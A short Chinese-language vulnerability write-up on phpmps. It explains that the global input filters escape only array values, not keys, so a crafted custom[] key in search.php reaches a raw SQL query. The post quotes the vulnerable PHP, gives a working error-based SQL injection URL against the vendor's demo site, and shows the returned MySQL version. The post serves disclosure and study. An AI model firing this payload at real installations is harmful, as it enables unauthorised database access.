phpmps弱过滤导致注入漏洞

摘要

首先全局过滤文件 addslashes_deep和sql_replace全部是针对数组的value的所以 key呢。。。
[php]
if(!get_magic_quotes_gpc()) {

首先全局过滤文件 addslashes_deep和sql_replace全部是针对数组的value的

所以 key呢。。。
[php]
if(!get_magic_quotes_gpc()) {

if (!empty($_GET))$_GET = addslashes_deep($_GET);

if (!empty($_POST))$_POST = addslashes_deep($_POST);

$_COOKIE = addslashes_deep($_COOKIE);

$_REQUEST = addslashes_deep($_REQUEST);

}

if (!empty($_REQUEST))$_REQUEST = sql_replace($_REQUEST);

if (!empty($_POST))$_POST = sql_replace($_POST);

if (!empty($_GET))$_GET = sql_replace($_GET);

unset($_REQUEST['table']);
[/php]
由于key被忽视 所以在/search.php 下
[php]
if(!empty($_REQUEST['custom'])) {

$sql = "SELECT infoid, COUNT(*) AS num FROM {$table}cus_value WHERE 0 ";

foreach($_REQUEST['custom'] AS $key => $val) {

if(!empty($val)) {

$cus_num++;

$sql .= " or (1 ";

if(is_array($val)) {

$cus_tom = get_custom_info($key);

$sql .= " AND cusid = '$key'";
[/php]
get_custom_info($key)

在function get_custom_info($cusid='')里面
[php]
$sql = "select * from {$table}custom where cusid='$cusid' ";

$res = $db->query($sql);
[/php]
直接查询了

导致注入

http://www.phpmps.com/demo/search.php?custom[xss%27)%20AND%20(SELECT%208734%20FROM(SELECT%20COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23]=1

返回信息，成功获取版本信息：

[php]
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT infoid, COUNT(*) AS num FROM demo_cus_value WHERE 0 or (1 AND cusid = 'xss') AND (SELECT 8734 FROM(SELECT COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)#' AND cusvalue like '%1%' ) GROUP BY infoid HAVING num = '1' ) [2] => Array ( [error] => Duplicate entry '5.0.96-community-nt1' for key 1 ) [3] => Array ( [errno] => 1062 ) )
[/php]